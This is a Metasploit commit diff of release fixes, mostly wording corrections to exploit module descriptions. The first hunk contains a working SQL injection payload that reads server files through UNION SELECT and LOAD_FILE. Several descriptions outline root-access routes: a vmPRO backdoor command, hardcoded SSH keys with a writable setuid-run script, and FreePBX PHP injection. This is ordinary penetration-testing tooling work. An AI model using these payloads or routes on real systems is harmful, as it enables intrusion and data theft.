Land #3136, release fixes
commit
f12171d1a0
|
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
file = datastore['FILEPATH'].unpack("H*")[0]
|
file = datastore['FILEPATH'].unpack("H*")[0]
|
||||||
catid = datastore['CATEGORYID']
|
catid = datastore['CATEGORYID']
|
||||||
|
|
||||||
payload = catid.to_s
|
payload = catid.to_s
|
||||||
payload << ") UNION ALL SELECT CONCAT(0x#{front_marker.unpack('H*')[0]}"
|
payload << ") UNION ALL SELECT CONCAT(0x#{front_marker.unpack('H*')[0]}"
|
||||||
payload << ",IFNULL(CAST(HEX(LOAD_FILE("
|
payload << ",IFNULL(CAST(HEX(LOAD_FILE("
|
||||||
payload << "0x#{file})) AS CHAR),0x20),0x#{back_marker.unpack('H*')[0]})#"
|
payload << "0x#{file})) AS CHAR),0x20),0x#{back_marker.unpack('H*')[0]})#"
|
||||||
|
|
|
@ -15,9 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => "Quantum vmPRO Backdoor Command",
|
'Name' => "Quantum vmPRO Backdoor Command",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module abuses a backdoor command in vmPRO 3.1.2. Any user, even without admin
|
This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin
|
||||||
privileges, can get access to the restricted SSH shell. By using the hidden backdoor
|
privileges, can get access to the restricted SSH shell. By using the hidden backdoor
|
||||||
"shell-escape" command it's possible to drop to a real root bash shell.
|
"shell-escape" command it's possible to drop to a real root bash shell. This module
|
||||||
|
has been tested successfully on Quantum vmPRO 3.1.2.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
|
|
@ -13,15 +13,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => "Array Networks vAPV and vxAG Private Key Privelege Escalation Code Execution",
|
'Name' => "Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a default hardcoded private SSH key or default hardcoded
|
This module exploits a default hardcoded private SSH key or default hardcoded
|
||||||
login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made
|
login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made
|
||||||
by Array Networks. After logged in as the unprivileged user, it's possible to
|
by Array Networks. After logged in as the unprivileged user, it's possible to modify
|
||||||
modify the world writable file /ca/bin/monitor.sh with our arbitrary code.
|
the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code.
|
||||||
Execution of the arbitrary code is possible by using the backend tool, running
|
Execution is possible by using the backend tool, running setuid, to turn the debug
|
||||||
setuid, to turn the debug monitoring on. This makes it possible to trigger our
|
monitoring on. This makes it possible to trigger a payload with root privileges.
|
||||||
payload with root privileges.
|
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
@ -79,7 +78,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
datastore['RHOST']
|
datastore['RHOST']
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def rport
|
def rport
|
||||||
datastore['RPORT']
|
datastore['RPORT']
|
||||||
end
|
end
|
||||||
|
@ -118,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def login_user_pass(user, pass)
|
def login_user_pass(user, pass)
|
||||||
print_status("#{rhost}:#{rport} - Attempt to login with '#{user}:#{pass}'")
|
print_status("#{rhost}:#{rport} - Attempting to login with '#{user}:#{pass}'")
|
||||||
|
|
||||||
opts = {
|
opts = {
|
||||||
:auth_methods => ['password', 'keyboard-interactive'],
|
:auth_methods => ['password', 'keyboard-interactive'],
|
||||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => "FreePBX config.php Remote Code Execution",
|
'Name' => "FreePBX config.php Remote Code Execution",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a vulnerability found in FreePBX version 2.9, 2.10, 2.11.
|
This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.
|
||||||
It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"
|
It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"
|
||||||
parameters "function" and "args".
|
parameters "function" and "args".
|
||||||
},
|
},
|
||||||
|
|
|
@ -15,10 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Name' => "MS14-012 Internet Explorer TextRange Use-After-Free",
|
'Name' => "MS14-012 Internet Explorer TextRange Use-After-Free",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
|
This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
|
||||||
was most likely introduced back in 2013, therefore only certain builds of MSHTML are
|
was most likely introduced in 2013, therefore only certain builds of MSHTML are
|
||||||
affected. In our testing with IE9, these vulnerable builds appear to be between
|
affected. In our testing with IE9, these vulnerable builds appear to be between
|
||||||
9.0.8112.16496 and 9.0.8112.16533, which implies August 2013 until early March 2014
|
9.0.8112.16496 and 9.0.8112.16533, which implies the vulnerability shipped between
|
||||||
(before the patch).
|
August 2013, when it was introduced, until the fix issued in early March 2014.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
|
|
@ -13,7 +13,7 @@ class Metasploit4 < Msf::Post
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super( update_info( info,
|
super( update_info( info,
|
||||||
'Name' => 'Testing Get Envs',
|
'Name' => 'Test Post::Common Get Envs',
|
||||||
'Description' => %q{ This module will test Post::Common get envs API methods },
|
'Description' => %q{ This module will test Post::Common get envs API methods },
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' => [ 'Ben Campbell'],
|
'Author' => [ 'Ben Campbell'],
|
||||||
|
|
Loading…
Reference in New Issue